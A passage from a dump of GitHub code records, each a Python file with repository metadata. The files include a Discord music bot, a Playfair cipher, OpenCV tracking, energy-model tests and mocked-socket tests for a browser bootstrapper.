log_class_probabilities.exp().cpu().detach().numpy()\n stat[\"predictions_at_t_stop\"] = predictions_at_t_stop.unsqueeze(-1).cpu().detach().numpy()\n stat[\"t_stop\"] = t_stop.unsqueeze(-1).cpu().detach().numpy()\n stat[\"targets\"] = y_true.cpu().detach().numpy()\n\n stats.append(stat)\n\n losses.append(loss.cpu().detach().numpy())\n\n # list of dicts to dict of lists\n stats = {k: np.vstack([dic[k] for dic in stats]) for k in stats[0]}\n\n return np.stack(losses).mean(), stats\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"MarcCoru/elects","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"33"} +{"seq_id":"10088899409","text":"import pandas as pd\r\nimport numpy as np\r\nimport collections\r\ndata = {\r\n 'customer_ID': [12, 23, 34, 45, 56, 67, 78, 89],\r\n 'customer_age': [30, 25, 28, 32, 22, 20, 30, 25]\r\n}\r\ndf = pd.DataFrame(data)\r\nage = df['customer_age']\r\nage_frequency = collections.Counter(age)\r\nprint(age_frequency)\r\n","repo_name":"ashik0072/ASHIK-fundamentals_of_datascience","sub_path":"p14.frequency distribution.py","file_name":"p14.frequency distribution.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"23238472137","text":"import jieba\ns = '陈海升(队长)(2015034643038):代码测试员。风格多变,擅长多种语言的”helloworld“编程,兴趣是下一门语言的“helloworld”。宣言是:学习没有期限,如果有,那就把它删掉。'\ns1='艾晓晗(2015034643010):项目经理。风格俏皮可爱,擅长统筹规划,兴趣广泛。宣言是:好好学习。'\ns2='詹振根(2015034643021):代码编写员。风格哲学,擅长在团队项目中carry,当大哥。对哲学和python很有兴趣。 宣言是:python python Michael Jackson。'\ns3='黄志明(2015034643001):ui设计。风格随性自然,擅长matlab;对数据挖掘、matlab很有兴趣。宣言是:做平凡的事,当不平凡的人。'\nm=s+s1+s2+s3\ncut = jieba.cut(m)\nfrom collections import Counter\nc = Counter(cut)\nl3=' ,。、?》《;:‘“’”、|】}【{,./<>?:\"\\|[]{}-=_+)(*&^%$#@!~`'\nfor key,value in list(c.items()):\n a1=key\n b1=l3.find(a1)\n c1=value\n if b1!=-1:\n del c[key]\n if c1==1:\n del c[key]\nprint(c)\nl1=[]\nl2=[]\nfor key,value in c.items():\n l1.append(key)\n l2.append(value)\nfrom pylab import mpl\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nimport matplotlib.pyplot as plt\nplt.bar(l1,l2)\nplt.show()\nimport numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nplt.pie(l2, labels=l1, autopct='%1.2f%%')\nplt.show()","repo_name":"lkdgn/python1","sub_path":"python作业/ljb.py","file_name":"ljb.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34634003556","text":"# Morgan Wilkinson\n# 07/22/2019\n\n# SavingWeb - This program downloads files from the web using the request module.\n\nimport requests\n\nres = requests.get(\"https://creativenovels.com/73/chapter-120-are-you-expecting/\")\ntry:\n\tres.raise_for_status()\nexcept Exception as exc:\n\tprint(\"Fatal Error: %s\" % (exc))\n\nplayFile = open(\"Test.html\", 'wb')\nfor chunk in res.iter_content(100000):\n\tplayFile.write(chunk)\n\nplayFile.close()","repo_name":"Morgan-Wilkinson/Python-Small-Projects","sub_path":"SavingWeb.py","file_name":"SavingWeb.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"41579626601","text":"class User:\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.account_balance = 0\n\n def make_deposit(self, amount):\n self.account_balance += amount\n return self\n\n def make_withdrawal (self, amount):\n if self.account_balance >= amount:\n self.account_balance -= amount\n else:\n print(\"Saldo insuficiente\")\n return self\n def display_user_balance(self):\n print(self.name, self.account_balance)\n return self\n #return self\n\n\n\n#Instancia de Objeto\nguido = User(\"Guido Van Rossum\", \"guido@python.com\")\nmonty = User(\"Monty Python\", \"monty@python.com\")\nroro = User(\"Rodrigo Salas\", \"salas@python.com\")\n\n# guido.make_deposit(100)\n# guido.make_deposit(200)\n# guido.make_deposit(200)\n# guido.make_withdrawal(100)\n# print(guido.display_user_balance())\n\nprint('Métodos encadenados')\n\nguido.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\nprint()\nmonty.make_deposit(200).make_deposit(100).make_withdrawal(100).display_user_balance()\nprint()\nroro.make_deposit(200).make_withdrawal(100).make_withdrawal(50).display_user_balance()","repo_name":"Carlos-maldonado578/full_stack_python","sub_path":"python/OOP/Usuario.py","file_name":"Usuario.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71707389535","text":"import logging, BigWorld\nfrom dossiers2.custom.records import DB_ID_TO_RECORD as ID2NAME\nlogger = logging.getLogger(__name__)\n\nclass VehicleAchievementsComponent(BigWorld.DynamicScriptComponent):\n\n def __init__(self):\n super(VehicleAchievementsComponent, self).__init__()\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] VehicleAchievementsComponent has been initialized')\n\n def setSlice_achievements(self, changePath, oldValue):\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] self.setSlice_achievements: achievements: %s, changePath: %s', self.achievements, changePath)\n startIndex, endIndex = changePath[(-1)]\n receivedAchievements = self.achievements[startIndex:endIndex]\n revokedAchievements = oldValue\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] Received: %s - Revoked: %s', (', ').join([ ID2NAME[item][1] for item in receivedAchievements if item in ID2NAME.iterkeys() ]), (', ').join([ ID2NAME[item][1] for item in revokedAchievements if item in ID2NAME.iterkeys() ]))","repo_name":"IzeBerg/wot-src","sub_path":"sources/res/in_battle_achievements/scripts/client/VehicleAchievementsComponent.py","file_name":"VehicleAchievementsComponent.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"21552121992","text":"#\n# CS 196 Data Hackerspace\n# Assignment 1: Data Parsing and NumPy\n# Due September 24th, 2018\n#\n\nimport json\nimport csv\nimport numpy as np\nimport re\n\ndef histogram_times(filename):\n\tf = open(filename)\n\tcsv_file = csv.reader(f)\n\tcrashes_per_hour = []\n\tfor row in csv_file:\n\t\tif row[1] != \"\" and row[1] != \"Time\":\n \t\t\tcrashes_per_hour.append(row[1][:2])\n\tcrashes = []\n\tfor x in range(24):\n\t\ty = \"%02d\" % x\n\t\ti = 0\n\t\tfor time in crashes_per_hour:\n\t\t\tif y == time:\n\t\t\t\ti += 1\n\t\tcrashes.append(i)\n\treturn crashes\n\n\ndef weigh_pokemons(filename, weight):\n\twith open(filename) as json_file: \n\t\tdata = json.load(json_file)\n\treturnList = []\n\tfor p in data['pokemon']:\n\t\tweight1 = re.findall(\"[+-]?\\d+\\.\\d+\", p['weight'])\n\t\tweight12 = weight1[0]\t\n\t\tif weight12 == weight:\n\t\t\treturnList.append(p['name'])\n\treturn returnList\n \n\ndef single_type_candy_count(filename):\n\twith open(filename) as json_file: \n\t\tdata = json.load(json_file)\n\tcandyCount = 0\n\tfor p in data['pokemon']:\n\t\tif len(p['type']) == 1:\n\t\t\tif 'candy_count' in p:\n\t\t\t\tcandyCount += p['candy_count']\n\treturn candyCount\n\ndef reflections_and_projections(points):\n\tpointsFloat = points.astype(float)\n\tpoints1 = np.flip(pointsFloat,0)\n\tcols = points1.shape[1]\n\tprint(points1)\n\trotate90 = np.array([[0, -1],[1, 0]])\n\tfor y in range(0, cols):\n\t\tflippedCordinate = np.array([[points1[0,y]],[points1[1,y]]])\n\t\tflippedRotated = np.matmul(rotate90, flippedCordinate)\n\t\tpoints1[0,y] = flippedRotated[0,0]\n\t\tpoints1[1,y] = flippedRotated[1,0]\n\t\tprojection = np.array([[1,3],[3,9]])\n\t\trotatedCord = np.array([[points1[0,y]],[points1[1,y]]])\n\t\tprojected = (np.matmul(projection, rotatedCord))\n\t\tpoints1[0,y] = .1*projected[0,0]\n\t\tpoints1[1,y] = .1*projected[1,0]\n\tprint(points1)\n\n\ndef normalize(image):\n\timage *= 255\n\timage = image/(np.max(image)-np.min(image))\n\timage *= (image - np.min(image))\n\treturn image\n\ndef sigmoid_normalize(image, a):\n image = image/(1+(1/(1 / np.exp((1 / a)+image - 128))))\n image *= 255\n print(image)\n\n\n\n","repo_name":"vitan12/Data_Hackerspace_Homework","sub_path":"Homework 1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14095810516","text":"import math\nimport pdb\n\nclass Quad:\n\n def __init__(self, x, y, z):\n self.a = x\n self.b = y\n self.c = z\n\n def solve(self):\n d = (self.b ** 2) - (4 * self.a * self.c)\n if d > 0:\n disc = math.sqrt(d)\n root1 = (-self.b + disc)/(2*self.a)\n root2 = (-self.b - disc) /(2*self.a)\n return root1, root2\n elif d == 0:\n return -self.b / 2 * self.a\n else:\n return \"This equation has no roots\"\n\nprint(__name__)\nif __name__ == '__main__':\n while True:\n a = int(input(\"Enter the value of a: \"))\n b = int(input(\"Enter the value of b: \"))\n c = int(input(\"Enter the value of c: \"))\n if a == -1:\n print(\"Exiting\")\n break\n #pdb.set_trace()\n #breakpoint()\n solver = Quad(a, b, c)\n roots = solver.solve()\n print(roots)\n\n","repo_name":"saurabht85/python_django_0622","sub_path":"Module5/debugging.py","file_name":"debugging.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"8071991634","text":"# Abi Rahmawan\r\n# V3921001\r\n# TI-D \r\n\r\nkey=input(\"MASUKKAN KUNCI : \") # memassukkan kunci\r\nprint(\"================================\")\r\nkey=key.replace(\" \", \"\") # menghilangkan spasi\r\nkey=key.upper() # merubah ke dalam huruf kapital\r\n\r\n# membuat fungsi matrix\r\ndef matrix(x,y,initial):\r\n return [[initial for i in range(x)] for j in range(y)]\r\n \r\nresult=list()\r\nfor c in key: # menyimpan kunci\r\n if c not in result:\r\n if c=='J': # mengecualikan huruf J\r\n result.append('I')\r\n else:\r\n result.append(c)\r\nflag=0\r\nfor i in range(65,91): # menyimpan karakter lain\r\n if chr(i) not in result:\r\n if i==73 and chr(74) not in result:\r\n result.append(\"I\")\r\n flag=1\r\n elif flag==0 and i==73 or i==74:\r\n pass \r\n else:\r\n result.append(chr(i))\r\nk=0\r\nmy_matrix=matrix(5,5,0) # inisialisasi matriks\r\nfor i in range(0,5): # membuat matriks\r\n for j in range(0,5):\r\n my_matrix[i][j]=result[k]\r\n k+=1\r\n\r\n# membuat fungsi untuk mendapatkan lokasi setiap karakter\r\ndef locindex(c): \r\n loc=list()\r\n if c=='J': # mengecualikan huruf J\r\n c='I'\r\n for i ,j in enumerate(my_matrix):\r\n for k,l in enumerate(j):\r\n if c==l:\r\n loc.append(i)\r\n loc.append(k)\r\n return loc\r\n\r\n# Enkripsi \r\ndef enkripsi(): \r\n msg=str(input(\"MASUKKAN KATA: \"))\r\n msg=msg.upper()\r\n msg=msg.replace(\" \", \"\") \r\n i=0\r\n for s in range(0,len(msg)+1,2):\r\n if s str:\n return f'{self.progress}/{self.duration}'\n\n @property\n def progress(self) -> Time:\n delta = datetime.now() - self.start_time\n delta = delta.total_seconds() + self.delta\n return Time(delta)\n\n @property\n def links(self):\n if self.type == 'file':\n links = f'[Url]({self.url})'\n else:\n links = []\n if self.yturl:\n links.append(f'[YouTube]({self.yturl})')\n if self.spurl:\n links.append(f'[Spotify]({self.spurl})')\n links = ' | '.join(links)\n return links if links else None\n\n @property\n def link(self) -> str:\n if self.yturl:\n return self.yturl\n elif self.spurl:\n return self.spurl\n else:\n return self.url\n\n def extract_url(self):\n from .search import ytdl, Youtube\n if self.url:\n pass\n elif self.type == 'file':\n pass\n elif self.type == 'spotify':\n data = ytdl.extract_info(self.title, download=False, process=True)\n self.yturl = data['entries'][0]['webpage_url']\n self.url = data['entries'][0]['url']\n elif self.type == 'youtube':\n data = ytdl.extract_info(self.yturl, download=False, process=False)\n self.url = Youtube.get_url_from_formats(data['formats'])\n\n def extract_source(self) -> discord.FFmpegPCMAudio:\n from .search import FFMPEG_OPTIONS\n if self.source:\n source = self.source\n self.source = None\n else:\n if not self.url:\n self.extract_url()\n source = discord.FFmpegPCMAudio(self.url, **FFMPEG_OPTIONS)\n return source\n\n\n@dataclass\nclass ServerMusic:\n \"\"\"Container for managing music in a server.\n\n Attributes\n -----------\n queue: List[:class:`Song`]\n The song queue.\n vc: :class:`discord.VoiceClient`\n The voice client of the server.\n is_playing: :class:`bool`\n Playing status.\n current_song: :class:`Song`\n The currently playing song.\n queue_msg: Dict[:class:`int`,:class:`discord.Message`]\n The queue messages in the server.\n now_playing: :class:`discord.Message`\n The now playing message.\n \"\"\"\n queue: list[Song] = field(default_factory=list)\n vc: discord.VoiceClient = None\n is_playing: bool = False\n current_song: Song | None = None\n queue_msg: dict[int, discord.Message] = field(default_factory=dict)\n now_playing: discord.Message = None\n\n def __len__(self):\n return len(self.queue)\n\n def clear(self):\n self.queue.clear()\n\n def shuffle(self):\n np.random.shuffle(self.queue)\n\n def remove(self, pos: int):\n del self.queue[pos]\n\n def move(self, _from: int, _to: int):\n self.queue.insert(_to, self.queue.pop(_from))\n\n def swap(self, pos1: int, pos2: int):\n self.queue[pos1], self.queue[pos2] = self.queue[pos2], self.queue[pos1]\n\n def reverse(self):\n self.queue.reverse()\n\n\nclass QueueEmbed:\n def __init__(self,\n server_music: ServerMusic,\n page: int,\n per_page: int = 10) -> None:\n self.view: View = self.create_view()\n self.server_music = server_music\n self.page = page\n self.per_page = per_page\n\n def add(self, add: int):\n self.page += add\n\n def set(self, value: int):\n self.page = value\n\n def create_view(self) -> View:\n button_first = Button(label='<<')\n button_backward = Button(label='<')\n button_forward = Button(label='>')\n button_last = Button(label='>>')\n\n async def first_callback(interaction: discord.Interaction):\n self.set(10**10)\n await interaction.response.edit_message(embed=self.embed)\n\n async def backward_callback(interaction: discord.Interaction):\n self.add(-1)\n await interaction.response.edit_message(embed=self.embed)\n\n async def forward_callback(interaction: discord.Interaction):\n self.add(1)\n await interaction.response.edit_message(embed=self.embed)\n\n async def last_callback(interaction: discord.Interaction):\n self.set(0)\n await interaction.response.edit_message(embed=self.embed)\n\n button_first.callback = first_callback\n button_backward.callback = backward_callback\n button_forward.callback = forward_callback\n button_last.callback = last_callback\n view = View()\n view.add_item(button_first)\n view.add_item(button_backward)\n view.add_item(button_forward)\n view.add_item(button_last)\n return view\n\n @property\n def embed(self) -> discord.Embed:\n queue_len = len(self.server_music.queue)\n page_len = int(np.ceil(queue_len/self.per_page))\n # loop page\n self.page = page_len if self.page < 1 else self.page\n self.page = 1 if self.page > page_len else self.page\n # cut the queue\n lower_bound = (self.page - 1) * self.per_page\n upper_bound = (self.page) * self.per_page\n if self.page == page_len: # last page\n songs = self.server_music.queue[lower_bound:]\n else:\n songs = self.server_music.queue[lower_bound:upper_bound]\n # generate text\n first_num = ((self.page - 1) * self.per_page) + 1\n text = ''\n for i, song in enumerate(songs):\n text += f'{first_num+i}. {song.title} [{song.duration}]\\n'\n footer = f'Page {self.page}/{page_len}'\n embed = discord.Embed(description=text, color=SILVER)\n embed.set_footer(text=footer)\n return embed\n","repo_name":"NotLafuan/sagiri-bot","sub_path":"utils/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":9013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38554479924","text":"import cv2\n\nTrList = [cv2.legacy.TrackerBoosting_create,\n cv2.TrackerMIL_create,\n cv2.TrackerKCF_create,\n cv2.legacy.TrackerTLD_create,\n cv2.legacy.TrackerMedianFlow_create,\n cv2.legacy.TrackerCSRT_create,\n cv2.legacy.TrackerMOSSE_create]\n\ntrackers = cv2.legacy.MultiTracker_create()\nvideo_src = \"./highway.mp4\"\nv = cv2.VideoCapture(video_src)\nret, frame = v.read()\nk = 2 # number of objects\nfor i in range(k):\n cv2.imshow('Frame',frame)\n bbox_i = cv2.selectROI('Frame',frame)\n tracker_i = TrList[5]()\n print(tracker_i)\n print(type(trackers))\n trackers.add(tracker_i,frame,bbox_i)\nwhile True:\n ret, frame = v.read()\n if not ret:\n break\n ok, boxes = trackers.update(frame)\n for box in boxes:\n (x,y,w,h) = [int(a) for a in box]\n cv2.rectangle(frame,(x,y),(x+w,y+h),(100,205,200),2)\n\n cv2.imshow('Frame',frame)\n key = cv2.waitKey(5)\n if key == ord('q'):\n break\nv.release()\ncv2.destroyWindow()\n","repo_name":"bob8dod/ML-studying","sub_path":"CV/ObjectTracking/MOT.py","file_name":"MOT.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41285063870","text":"import pandas as pd\nimport numpy as np\nimport os\n\n\ndef combine_table(table_1, table_2, table_3, out_path):\n df_1 = pd.read_excel(table_1, sheet_name='code')\n df_2 = pd.read_excel(table_2, sheet_name='code')\n df_3 = pd.read_excel(table_3, sheet_name='code')\n\n columns = ['glass_id', 'panel_id', 'category', 'score']\n out_df = pd.DataFrame(columns=columns)\n id = 0\n\n for row in df_1.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('.')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n for row in df_2.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('.')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n for row in df_3.itertuples():\n image_name = getattr(row, 'image_name')\n glass = image_name.split('_')[0]\n\n panel = getattr(row, 'panel_id')\n infer = getattr(row, 'category')\n score = getattr(row, 'score')\n\n id += 1\n out_df.loc[id] = [glass, panel, infer, score]\n\n out_df.to_excel(out_path, sheet_name='results')\n print('[FINISH] Table Combination.')\n\n\n\ndef merge_excel(category, root_path, out_path):\n \"\"\"\n :info: 默认是将‘0’类判断为预测正确\n :param category:\n :param root_path:\n :param out_path:\n :return:\n \"\"\"\n n = len(category)\n category = sorted(category)\n df = pd.DataFrame(np.zeros([n, n], dtype='uint'), index=category, columns=category)\n\n for table in os.listdir(root_path):\n table_path = os.path.join(root_path, table)\n df_tmp = pd.read_excel(table_path, index_col=0, sheet_name='图表')\n for col in df_tmp.columns:\n for row in df_tmp.columns:\n df[col][row] = int(df[col][row]) + int(df_tmp[col][row])\n\n predict_sum = []\n ori_sum = []\n precision_lst = []\n recall_lst = []\n for i in category:\n predict_cnt = sum(df[i])\n ori_cnt = sum(df.loc[i]) + df[i]['0']\n predict_sum.append(predict_cnt)\n ori_sum.append(ori_cnt)\n correct = df[i][i] + df[i]['0']\n precision = round(correct / predict_cnt, 3)\n recall = round(correct / ori_cnt, 3)\n precision_lst.append(precision)\n recall_lst.append(recall)\n\n df.loc['预测合计'] = predict_sum\n df.loc['准确率'] = precision_lst\n ori_sum = ori_sum + [None] * 2\n recall_lst = recall_lst + [None] * 2\n df['判图合计'] = ori_sum\n df['召回率'] = recall_lst\n\n df.to_excel(out_path, sheet_name='统计')\n print('[FINISH] Saving file to {}'.format(out_path))\n\n\nif __name__ == '__main__':\n table_1 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\2CEE01_results.xlsx\"\n table_2 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\2CIL01_results.xlsx\"\n table_3 = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\Mapping_results.xlsx\"\n out_path = r\"E:\\Working\\Visionox\\V2_lighter\\file\\POC_report\\DemoReport\\test_1126\\results.xlsx\"\n combine_table(table_1, table_2, table_3, out_path)","repo_name":"OPzealot/Tools","sub_path":"merge_excel.py","file_name":"merge_excel.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37241625249","text":"import argparse, socket\n\ndef client(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n print('Client has been assigned socket name', sock.getsockname())\n reply = sock.recv(1000)\n print(reply.decode())\n sock.close()\n\nif __name__ == '__main__':\n choices = {'client': client}\n parser = argparse.ArgumentParser(description='Send and receive over TCP')\n parser.add_argument('role', choices=choices, help='which role to play')\n parser.add_argument('host', help='interface the server listens at;'\n ' host the client sends to')\n parser.add_argument('-p', metavar='PORT', type=int, default=1060,\n help='TCP port (default 1060)')\n args = parser.parse_args()\n function = choices[args.role]\n function(args.host, args.p)\n","repo_name":"readera193/Python","sub_path":"網際網路協定/FINAL-Q1.py","file_name":"FINAL-Q1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37271715678","text":"import unittest\nimport pandas as pd\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom Download_files import *\nfrom Pathfinder_processing_steps import remove_grid_from_results_multiply_with_lenght, pathfinder_main\nfrom Distribution import peakdemand_csv, transmission_matrix\nfrom post_elec_GIS_functions import network_length\n\nclass ImportTestCase(unittest.TestCase):\n def test_all_grid_is_removed(self):\n \"\"\"\n The test asserts that all cells that have a value below 0.5 is excluded from the total distribution lines for a 9 regions model\n :return:\n \"\"\"\n i = 1\n dict_pathfinder = {}\n dict_weight = {}\n while i <2:\n name = str(i)\n electrified = pd.read_csv(\"../test_data/temp/dijkstra/elec_path_%s.csv\" % (name), header=0 , index_col='Unnamed: 0')\n sum_one = electrified.sum()\n sum = sum_one.sum() #11638\n dict_pathfinder[name] = electrified\n weights = np.genfromtxt(\"../test_data/temp/dijkstra/%s_weight.csv\" %(name), delimiter=',')\n weights_trimmed = weights[1:-1, 1:-1]\n weight_pandas = pd.DataFrame(weights_trimmed)\n dict_weight[name] = weight_pandas\n sum_before =+ sum\n i += 1\n tofolder = '../test_data/'\n remove_grid_from_results_multiply_with_lenght(dict_pathfinder, dict_weight, tofolder) #74 target should be removed\n distribution = pd.read_csv(os.path.join(tofolder, 'distributionlines.csv'))\n sum_after = distribution.loc[0]['0']\n assert sum_before - sum_after==74\n\n #def test_whole_pathfinder_process(self):\n # path = '../test_data/Projected_files/'\n # proj_path = '../test_data/temp/temp'\n # elec_shp = '../test_data/Projected_files/elec.shp'\n # tofolder = '../test_data/'\n # pathfinder_main(path,proj_path, elec_shp, tofolder)\n # assert 1==1\n\n def test_peakdemand(self):\n HV = '../test_data/run/HV_cells.csv'\n distribution_length_cell_ref = '../test_data/run/ref/distribution.csv'\n distribution = '../test_data/run/ref/distributionlines.csv'\n demand = '../test_data/run/ref/ref_demand.csv'\n specifieddemand = '../test_data/run/ref/demandprofile_rural.csv'\n capacitytoactivity = 31.536\n yearsplit = '../test_data/run/Demand/yearsplit.csv'\n reffolder = '../test_data/run/ref'\n distr_losses = 0.83\n\n peakdemand_csv(demand, specifieddemand, capacitytoactivity, yearsplit, distr_losses, HV, distribution,\n distribution_length_cell_ref, reffolder)\n\n # error message in case if test case got failed\n results = pd.read_csv(os.path.join(reffolder,'peakdemand.csv'),index_col='Fuel')\n first = results.loc['TRLV_1_0', '2040']\n second = 0.54\n decimalPlace = 2\n self.assertAlmostEqual( first, second, decimalPlace)\n\n def test_transmissionlines_connection(self):\n topath = '../test_data/run/Demand'\n noHV = '../test_data/run/noHV_cells.csv'\n HV = '../test_data/run/HV_cells.csv'\n minigrid = '../test_data/run/elec_noHV_cells.csv'\n neartable = '../test_data/run/Demand/Near_table.csv'\n adjacencym = transmission_matrix(neartable, noHV, HV, minigrid, topath)\n self.assertTrue(len(adjacencym) == 656)\n\n def test_networklength_calculation(self):\n tofolder = '../test_data/run/ref'\n demandcells = '../test_data/run/Demand/demand_cells.csv'\n input = '../test_data/input/input_data.csv'\n demand = network_length(demandcells, input, tofolder)\n first = demand.loc['11', 'LV_km']\n second =2.66\n decimalPlace = 2\n self.assertAlmostEqual(first,second,decimalPlace)\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"KTH-dESA/GEOSeMOSYS_Kenya","sub_path":"src/test_GEOSeMOSYS_Kenya.py","file_name":"test_GEOSeMOSYS_Kenya.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19361025866","text":"# type: ignore\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\"\"\"ffpuppet bootstrapper tests\"\"\"\n# pylint: disable=protected-access\n\nfrom itertools import repeat\nfrom socket import socket, timeout\nfrom threading import Thread\n\nfrom pytest import mark, raises\n\nfrom .bootstrapper import Bootstrapper\nfrom .exceptions import BrowserTerminatedError, BrowserTimeoutError, LaunchError\n\n\ndef test_bootstrapper_01():\n \"\"\"test simple Bootstrapper()\"\"\"\n with Bootstrapper() as bts:\n assert bts._socket is not None\n assert bts.location.startswith(\"http://127.0.0.1:\")\n assert int(bts.location.split(\":\")[-1]) > 1024\n assert bts.port > 1024\n assert bts.port not in Bootstrapper.BLOCKED_PORTS\n bts.close()\n assert bts._socket is None\n\n\ndef test_bootstrapper_02(mocker):\n \"\"\"test Bootstrapper.wait() failure waiting for initial connection\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.accept.side_effect = timeout\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test failure\n with raises(\n BrowserTerminatedError, match=\"Failure waiting for browser connection\"\n ):\n bts.wait(lambda: False)\n assert fake_sock.accept.call_count == 1\n fake_sock.reset_mock()\n # test timeout\n mocker.patch(\"ffpuppet.bootstrapper.time\", side_effect=(1, 1, 1, 2))\n with raises(\n BrowserTimeoutError, match=\"Timeout waiting for browser connection\"\n ):\n bts.wait(lambda: True, timeout=0.1)\n # should call accept() at least 2x for positive and negative timeout check\n assert fake_sock.accept.call_count > 1\n\n\ndef test_bootstrapper_03(mocker):\n \"\"\"test Bootstrapper.wait() failure waiting for request\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.side_effect = timeout\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test failure\n with raises(BrowserTerminatedError, match=\"Failure waiting for request\"):\n bts.wait(lambda: False)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.close.call_count == 1\n fake_conn.reset_mock()\n # test timeout\n mocker.patch(\"ffpuppet.bootstrapper.time\", side_effect=(1, 1, 1, 1, 2))\n with raises(BrowserTimeoutError, match=\"Timeout waiting for request\"):\n bts.wait(lambda: True, timeout=0.1)\n # should call recv() at least 2x for positive and negative timeout check\n assert fake_conn.recv.call_count > 1\n assert fake_conn.close.call_count == 1\n\n\ndef test_bootstrapper_04(mocker):\n \"\"\"test Bootstrapper.wait() failure sending response\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.return_value = \"A\"\n fake_conn.sendall.side_effect = timeout\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n # test timeout\n with raises(BrowserTimeoutError, match=\"Timeout sending response\"):\n bts.wait(lambda: True)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.sendall.call_count == 1\n assert fake_conn.close.call_count == 1\n fake_conn.reset_mock()\n # test failure\n with raises(BrowserTerminatedError, match=\"Failure during browser startup\"):\n bts.wait(lambda: False)\n assert fake_conn.recv.call_count == 1\n assert fake_conn.sendall.call_count == 1\n assert fake_conn.close.call_count == 1\n\n\ndef test_bootstrapper_05(mocker):\n \"\"\"test Bootstrapper.wait() target crashed\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.return_value = \"foo\"\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n with raises(BrowserTerminatedError, match=\"Failure during browser startup\"):\n bts.wait(lambda: False)\n assert fake_conn.close.call_count == 1\n\n\n@mark.parametrize(\n \"redirect, recv, closed\",\n [\n # normal startup\n (None, (\"foo\",), 1),\n # with a redirect url\n (\"http://127.0.0.1:9999/test.html\", (\"foo\",), 1),\n # request size matches buffer size\n (None, (\"A\" * Bootstrapper.BUF_SIZE, timeout), 1),\n # large request\n (None, (\"A\" * Bootstrapper.BUF_SIZE, \"foo\"), 1),\n # slow startup\n (None, (timeout, timeout, \"foo\"), 1),\n # slow failed startup with retry\n (None, (timeout, \"\", \"foo\"), 2),\n ],\n)\ndef test_bootstrapper_06(mocker, redirect, recv, closed):\n \"\"\"test 